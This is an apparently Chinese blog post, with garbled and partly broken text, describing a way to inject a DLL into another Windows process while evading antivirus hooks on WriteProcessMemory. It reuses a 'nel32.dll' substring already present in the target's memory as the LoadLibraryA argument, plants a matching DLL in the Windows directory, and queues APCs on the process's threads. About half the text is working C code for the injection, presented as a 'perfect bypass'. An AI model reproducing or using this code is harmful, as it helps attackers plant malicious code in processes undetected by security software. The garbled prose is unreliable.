S.l.e!ep.￠%

目數(shù)殺軟都hook NtWriteVirtualMemoryNtUserSetWindowsHookAW、NtUserSetWindowsHookE防止代碼注入。

　　關(guān)于代碼注入Ring3層主有：

　　l 遠(yuǎn)程線程CreateRemoteThread

　　l 消息鉤子SetWindowsHookEx

　　l Ring3 APC QueueUserApc

　　l 修改線程文SetContextThread

　　其第種第三種需傳入個(gè)param，但求這個(gè)param必須目標(biāo)進(jìn)程存空間，些比較笨重，直接目標(biāo)進(jìn)程VirtualAllocEx存，然希望參數(shù)容入這個(gè)存，使WriteProcessMemory函數(shù)，而這個(gè)函數(shù)被hook，所以殺軟以容易攔截代碼注入行。

　　仔細(xì)想想，殺軟這種防御失敗！原因個(gè)param，攻擊完全沒有必做這么動(dòng)作去目標(biāo)進(jìn)程存空間申存并存，思考否以不WriteProcessMemory函數(shù)呢？反目就得個(gè)合理param，并且這個(gè)param目標(biāo)進(jìn)程存空間即！

　　思考，原切這么容易啊，哈哈！樂半天~~~

　　舉個(gè)例子：假設(shè)這樣注入：

　　QueueUserAPC((PAPCFUNC)LoadLibraryA, hThread, (ULONG_PTR)param) ;

　　想讓面param容個(gè)“xxx.dll”,就以，而且求這個(gè)param目標(biāo)進(jìn)程存空間

　　您想么？哈哈

　　答案：直接目標(biāo)進(jìn)程搜索個(gè)這樣字符串“nel32.dll”就以啦！因“kernel32.dll” 這樣字符串定存，那么“kernel32.dll” 不樣，那就隨便使“nel32.dll”，或“el32.dll”，都以啊！最往windows目錄面撂進(jìn)入個(gè)nel32.dll，這樣注入部分殺軟都不能攔截！哈哈！

　　段程序，做個(gè)試驗(yàn)，僅測試趨勢(shì)，完美繞過！其實(shí)殺軟稍測試。。。

DWORD EnumThreadandInjectDll(char *processName,HANDLE hProcess, DWORD dwProcessID,TIDLIST *pThreadIdList)
{
TIDLIST *pCurrentTid = pThreadIdList ;
const char szInjectModName[] = "nel32.dll";
DWORD dwLen = strlen(szInjectModName) ;
　　
//////////////////////////////////////////////////////////////////////////
//不目標(biāo)進(jìn)程存
//直接目標(biāo)進(jìn)程搜索出 nel32.dll 這樣字符串 并注入
//////////////////////////////////////////////////////////////////////////
int bufflen=30000;
char *buffer=(char *)malloc(sizeof(char)*bufflen);
DWORD dwNumberOfBytesRead;
DWORD defaultAddress;
//獲得該進(jìn)程基址
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, dwProcessID) ;
if(!hSnapshot)
{
　 printf("CreateToolhelp32Snapshot error!n");
　 return 0;
}
MODULEENTRY32 me = { sizeof(me) };
　　BOOL fOk =Module32First(hSnapshot,&me);
if(!fOk)
{
　 printf("Module32First error!n");
　 return 0;
}
　　for (; fOk; fOk = Module32Next(hSnapshot,&me))
　　{
　 printf("%s process module name = %sn",processName,me.szModule);
　　　　// 得進(jìn)程模塊基址
　 if(stricmp(me.szModule,processName)==0)
　 {
　　defaultAddress=(DWORD)me.modBaseAddr;
　　printf("%s process module base = 0x%08Xn",processName,defaultAddress);
　　break;
　 }
　　}
//搜索
if(!ReadProcessMemory(hProcess,(LPCVOID)defaultAddress,buffer,bufflen,&dwNumberOfBytesRead))
{
　 printf("ReadProcessMemory error!n");
　 return 0;
}
for(int i=0;i<bufflen-dwLen;i++)
{
　 if(strnicmp(buffer+i,szInjectModName,dwLen)==0)
　 {
　　printf("found nel32.dll already!... %sn",buffer+i);
　　while (pCurrentTid)
　　{
　　 HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, pCurrentTid->dwTid) ;
　　
　　 if (hThread != NULL)
　　 {
　　　//
　　　// 注入DLL指定進(jìn)程
　　　//
　　　QueueUserAPC((PAPCFUNC)LoadLibraryA, hThread, (ULONG_PTR)(defaultAddress+i)) ;
　　 }
　　
　　 printf("TID:%dn", pCurrentTid->dwTid) ;
　　 pCurrentTid = pCurrentTid->pNext ;
　　}
　　break;
　 }
}
　　
return 0 ;
}